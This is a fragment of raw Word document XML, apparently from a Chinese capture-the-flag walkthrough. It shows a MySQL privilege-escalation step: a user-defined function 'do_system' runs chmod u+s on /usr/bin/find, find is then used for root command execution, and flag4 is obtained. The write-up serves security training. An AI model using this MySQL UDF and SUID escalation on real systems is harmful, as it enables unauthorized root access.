          <w:p w14:paraId="38A7D3B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19713DB1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select * from mysql.func;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2858639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select * from mysql.func;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F1DC8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+-----------+-----+-------------+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A692EC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| name      | ret | dl          | type     |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F5F13B8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+-----------+-----+-------------+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D844539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| do_system |   2 | sdfz_udf.so | function |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66606B34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+-----------+-----+-------------+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFD9F61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1 row in set (0.00 sec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD81EE2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5D25AB5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select do_system('chmod u+s /usr/bin/find');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092B813A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【chmod u+s 表示给某个程序的所有者以suid权限，可以像root用户一样操作】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65094644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select do_system('chmod u+s /usr/bin/find');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FD9816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+--------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46456EE8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| do_system('chmod u+s /usr/bin/find') |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BCA01B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lastRenderedPageBreak/>
              <w:t>+--------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F57263F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|                                    0 |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D62EADF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+--------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D93863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1 row in set (0.00 sec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065523D5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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4C4B38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mysql&gt; exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08EE5699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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A7CE859" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="001353C0">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="8"/>
                <w:kern w:val="0"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B74E6">
              <w:rPr>
                <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="8"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Bye</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="096DA439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4E236701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33CF6E1D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60CB88B4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1D93926B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53A1046A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40003EEA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49227CAD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1E3DC740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186FA6CB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2C480D89" w14:textId="77777777" w:rsidR="001353C0" w:rsidRPr="007B74E6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看下我们当前的权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BFAC3" w14:textId="6BD4F341" w:rsidR="001353C0" w:rsidRPr="007B74E6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00067A7A" wp14:editId="13954050">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3" name="AutoShap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B7C92" id="AutoShape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F9H5YnoAQAAxQ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  <w:r w:rsidRPr="001353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31AFFB" wp14:editId="14390DD9">
            <wp:extent cx="4538696" cy="623892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8696" cy="6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B4F" w14:textId="281F9EF1" w:rsidR="001353C0" w:rsidRDefault="001353C0" w:rsidP="001353C0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然后用find执行命令提权成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602159CB" w14:textId="77777777" w:rsidR="001353C0" w:rsidRPr="001353C0" w:rsidRDefault="001353C0" w:rsidP="001353C0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E45180E" w14:textId="2D7D5AAF" w:rsidR="001353C0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6C7817B" wp14:editId="5284033F">
            <wp:extent cx="5274310" cy="4673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BA66" w14:textId="00B7C56A" w:rsidR="001353C0" w:rsidRPr="007B74E6" w:rsidRDefault="001353C0" w:rsidP="001353C0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51D2809" wp14:editId="6A95A168">
            <wp:extent cx="1257309" cy="70485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D1D3" w14:textId="77777777" w:rsidR="001353C0" w:rsidRPr="007B74E6" w:rsidRDefault="001353C0" w:rsidP="001353C0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5FD0F40F" wp14:editId="6E2FD761">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2" name="AutoShap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92DDA" id="AutoShape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C7eXh4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56F5BC5D" w14:textId="77777777" w:rsidR="001353C0" w:rsidRDefault="001353C0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</w:p>
    <w:p w14:paraId="4C1913DD" w14:textId="095E0AB5" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B74E6">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>得到flag4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD7D8B" w14:textId="0FB61E95" w:rsidR="001353C0" w:rsidRPr="007B74E6" w:rsidRDefault="001353C0" w:rsidP="007B74E6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8BFE48A" wp14:editId="3478DB98">
            <wp:extent cx="5274310" cy="2643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1BDD19" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="007B74E6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43E7D098" wp14:editId="2F3A2957">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="AutoShap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63127D" id="AutoShape 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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="05005180" w14:textId="77777777" w:rsidR="00803218" w:rsidRDefault="00803218"/>
    <w:sectPr w:rsidR="008032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98C"/>
    <w:rsid w:val="00056ED9"/>
    <w:rsid w:val="001353C0"/>
    <w:rsid w:val="00202221"/>
    <w:rsid w:val="002A41B2"/>
    <w:rsid w:val="003102FB"/>
    <w:rsid w:val="00351392"/>
    <w:rsid w:val="0042498C"/>
    <w:rsid w:val="004C7F3B"/>
    <w:rsid w:val="00580500"/>
    <w:rsid w:val="006A4453"/>
    <w:rsid w:val="007B74E6"/>
    <w:rsid w:val="00803218"/>
    <w:rsid w:val="00844391"/>
    <w:rsid w:val="008F2F1D"/>
    <w:rsid w:val="009C34B7"/>
    <w:rsid w:val="00C01762"/>
    <w:rsid w:val="00C36EA1"/>
    <w:rsid w:val="00CA3DCF"/>
    <w:rsid w:val="00DD5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7887"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B2A2E624-EA75-4EC2-B658-0556C5542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5139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513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99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rebootuser/LinEnum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11</Pages>
  <Words>641</Words>
  <Characters>3655</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>30</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop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949947516@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>949947516@qq.com</cp:lastModifiedBy>
  <cp:revision>48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-19T14:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-19T15:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>